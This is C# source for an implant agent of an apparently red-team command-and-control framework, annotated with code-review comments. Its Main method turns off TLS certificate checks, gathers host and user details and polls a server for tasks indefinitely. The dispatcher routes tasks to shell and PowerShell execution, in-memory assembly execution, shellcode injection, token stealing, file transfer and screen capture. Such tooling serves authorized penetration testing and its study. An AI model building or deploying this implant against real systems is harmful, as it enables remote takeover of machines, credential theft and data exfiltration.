/// <summary>
/// Reports this task's outcome to the server through <paramref name="implant"/>
/// and then drops the task's entry from <c>implant.jobs</c>.
/// </summary>
/// <param name="implant">The implant whose transport methods and job list are used.</param>
/// <remarks>
/// Nothing is sent from here when the status is "complete" and the command is
/// "download" or "screencapture", or when the status is neither "complete" nor
/// "error"; presumably those handlers report on their own (not visible in this
/// excerpt, confirm against the handlers).
/// </remarks>
private void SendResult(SCImplant implant)
{
    if (this.status == "complete" &&
        this.command != "download" &&
        this.command != "screencapture")
    {
        // Output first, then the completion marker for the same task id.
        implant.PostResponse(new SCTaskResp(this.id, this.message));
        implant.SendComplete(this.id);
    }
    else if (this.status == "error")
    {
        implant.SendError(this.id, this.message);
    }

    try
    {
        // NOTE(review): forward iteration combined with RemoveAt skips the element
        // that shifts into slot i after a removal, so a second entry with the same
        // shortId directly after the first would be left in the list.
        // NOTE(review): Main adds to implant.jobs on the main thread while this
        // method runs on the per-task thread; no lock is visible in this excerpt.
        for (int i = 0; i < implant.jobs.Count; ++i)
        {
            if (implant.jobs[i].shortId == this.shortId)
            {
                implant.jobs.RemoveAt(i);
            }
        }
    }
    catch (Exception e)
    {
        // This should only happen when testing.
        // Every exception type is swallowed here; the only trace is debug output.
        Debug.WriteLine($"[!] Caught exception: {e.Message}");
    }
}
/// <summary>
/// Entry point: builds an <c>SCImplant</c> from the command-line arguments and
/// local host details, initializes it, then polls the server for tasks forever,
/// running each received task on its own thread.
/// </summary>
/// <param name="args">
/// <c>args[0]</c> is the server base URL ("/api/v1.3/" is appended),
/// <c>args[1]</c> is the base64-encoded pre-shared key, and
/// <c>args[2]</c> is the payload UUID. The array length is not checked.
/// </param>
static void Main(string[] args)
{
    // Necessary to disable certificate validation
    // NOTE(review): this callback is process-wide and accepts every server
    // certificate, so TLS gives no server authentication on this channel.
    ServicePointManager.ServerCertificateValidationCallback = delegate { return true; };
    SCImplant implant = new SCImplant()
    {
        uuid = args[2], // Generated when payload is created in Apfell
        endpoint = args[0] + "/api/v1.3/",
        host = Dns.GetHostName(),
        ip = Dns.GetHostEntry(Dns.GetHostName()) // Necessary because the host may have more than one interface
            // NOTE(review): FirstOrDefault yields null when the host has no IPv4
            // address, and the ToString() call then throws NullReferenceException.
            .AddressList.FirstOrDefault(ip => ip.AddressFamily == AddressFamily.InterNetwork).ToString(),
        domain = Environment.UserDomainName,
        os = Environment.OSVersion.VersionString,
        architecture = "x64", // hard-coded, not derived from the running process
        pid = Process.GetCurrentProcess().Id,
        sleep = 5000, // passed to Thread.Sleep below, so milliseconds between polls
        user = Environment.UserName
    };
    HTTP.crypto.PSK = Convert.FromBase64String(args[1]);

    // If initialization fails the method simply returns and the process ends.
    if (implant.InitializeImplant())
    {
        int shortId = 1; // local, monotonically increasing job number
        while (true)
        {
            SCTask task = implant.CheckTasking();
            if (task.command != "none")
            {
                task.shortId = shortId;
                shortId++;
                // 'task' is declared inside the loop body, so each lambda captures
                // its own task instance.
                Thread t = new Thread(() => task.DispatchTask(implant));
                t.Start();

                // NOTE(review): this condition is always true (no string equals both
                // "jobs" and "jobkill"), so job-tracking tasks are added to the list
                // as well, contrary to the comment on the next line.
                if (task.command != "jobs" || task.command != "jobkill") // We don't want to add our job tracking jobs.
                {
                    Job j = new Job
                    {
                        shortId = task.shortId,
                        task = task.command,
                        thread = t
                    };

                    // Append the parameters so the job entry shows the full tasking.
                    if (task.@params != "")
                        j.task += " " + task.@params;

                    implant.jobs.Add(j);
                }
            }
            Thread.Sleep(implant.sleep);
        }
    }
}
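/// <summary>
/// Handle a new task: route it to the handler that matches <c>this.command</c>,
/// then report the outcome through <c>SendResult</c>.
/// </summary>
/// <param name="implant">The CaramelImplant we're handling a task for</param>
/// <remarks>
/// Command names are compared with ordinal, case-sensitive string equality.
/// A command that matches no branch runs no handler, but <c>SendResult</c> is
/// still called. Only "sleep" is handled inline; every other command delegates
/// to an <c>Execute</c>/<c>Revert</c> method defined outside this excerpt.
/// </remarks>
public void DispatchTask(SCImplant implant)
{
    if (this.command == "cd")
    {
        Debug.WriteLine("[-] DispatchTask - Tasked to change directory " + this.@params);
        ChangeDir.Execute(this);
    }
    else if (this.command == "download")
    {
        Debug.WriteLine("[-] DispatchTask - Tasked to send file " + this.@params);
        Download.Execute(this, implant);
    }
    else if (this.command == "execute_assembly")
    {
        Debug.WriteLine("[-] DispatchTask - Tasked to execute assembly " + this.@params);
        Tasks.ExecAssembly.Execute(this, implant);
    }
    else if (this.command == "exit")
    {
        Debug.WriteLine("[-] DispatchTask - Tasked to exit");
        Exit.Execute(this, implant);
    }
    else if (this.command == "jobs")
    {
        Debug.WriteLine("[-] DispatchTask - Tasked to list jobs");
        Jobs.Execute(this, implant);
    }
    else if (this.command == "jobkill")
    {
        // Same handler as "jobs"; only the debug message differs in this method.
        Debug.WriteLine($"[-] DispatchTask - Tasked to kill job {this.@params}");
        Jobs.Execute(this, implant);
    }
    else if (this.command == "kill")
    {
        Debug.WriteLine("[-] DispatchTask - Tasked to kill PID " + this.@params);
        Kill.Execute(this);
    }
    else if (this.command == "ls")
    {
        string path = this.@params;
        Debug.WriteLine("[-] DispatchTask - Tasked to list directory " + path);
        DirectoryList.Execute(this, implant);
    }
    else if (this.command == "make_token")
    {
        // Only the first space-separated field of the parameters is logged.
        Debug.WriteLine("[-] DispatchTask - Tasked to make a token for " + this.@params.Split(' ')[0]);
        Token.Execute(this);
    }
    else if (this.command == "ps")
    {
        Debug.WriteLine("[-] DispatchTask - Tasked to list processes");
        ProcessList.Execute(this);
    }
    else if (this.command == "powershell")
    {
        Debug.WriteLine("[-] DispatchTask - Tasked to run powershell");
        Powershell.Execute(this);
    }
    else if (this.command == "rev2self")
    {
        Debug.WriteLine("[-] DispatchTask - Tasked to revert token");
        Token.Revert(this);
    }
    else if (this.command == "run")
    {
        Debug.WriteLine("[-] DispatchTask - Tasked to start process");
        Proc.Execute(this, implant);
    }
    else if (this.command == "screencapture")
    {
        Debug.WriteLine("[-] DispatchTask - Tasked to take screenshot.");
        ScreenCapture.Execute(this, implant);
    }
    else if (this.command == "shell")
    {
        // Same handler as "run".
        Debug.WriteLine("[-] DispatchTask - Tasked to run shell command.");
        Proc.Execute(this, implant);
    }
    else if (this.command == "shinject")
    {
        Debug.WriteLine("[-] DispatchTask - Tasked to run shellcode.");
        Shellcode.Execute(this);
    }
    else if (this.command == "sleep")
    {
        try
        {
            // The parameter is parsed as whole seconds and stored as milliseconds.
            int sleep = Convert.ToInt32(this.@params);
            Debug.WriteLine("[-] DispatchTask - Tasked to change sleep to: " + sleep);
            implant.sleep = sleep * 1000;
            this.status = "complete";
        }
        catch
        {
            // Bare catch: any exception raised in the try block is reported as a
            // non-integer value.
            Debug.WriteLine("[-] DispatchTask - ERROR sleep value provided was not int");
            this.status = "error";
            this.message = "Please provide an integer value";
        }
    }
    else if (this.command == "spawn")
    {
        Debug.WriteLine("[-] DispatchTask - Tasked to spawn");
        Spawn.Execute(this);
    }
    else if (this.command == "steal_token")
    {
        // Same handler as "make_token".
        Debug.WriteLine("[-] DispatchTask - Tasked to steal token");
        Token.Execute(this);
    }
    else if (this.command == "upload")
    {
        Debug.WriteLine("[-] DispatchTask - Tasked to get file from server");
        Upload.Execute(this, implant);
    }

    // Runs for every task, including commands that matched no branch above.
    this.SendResult(implant);
}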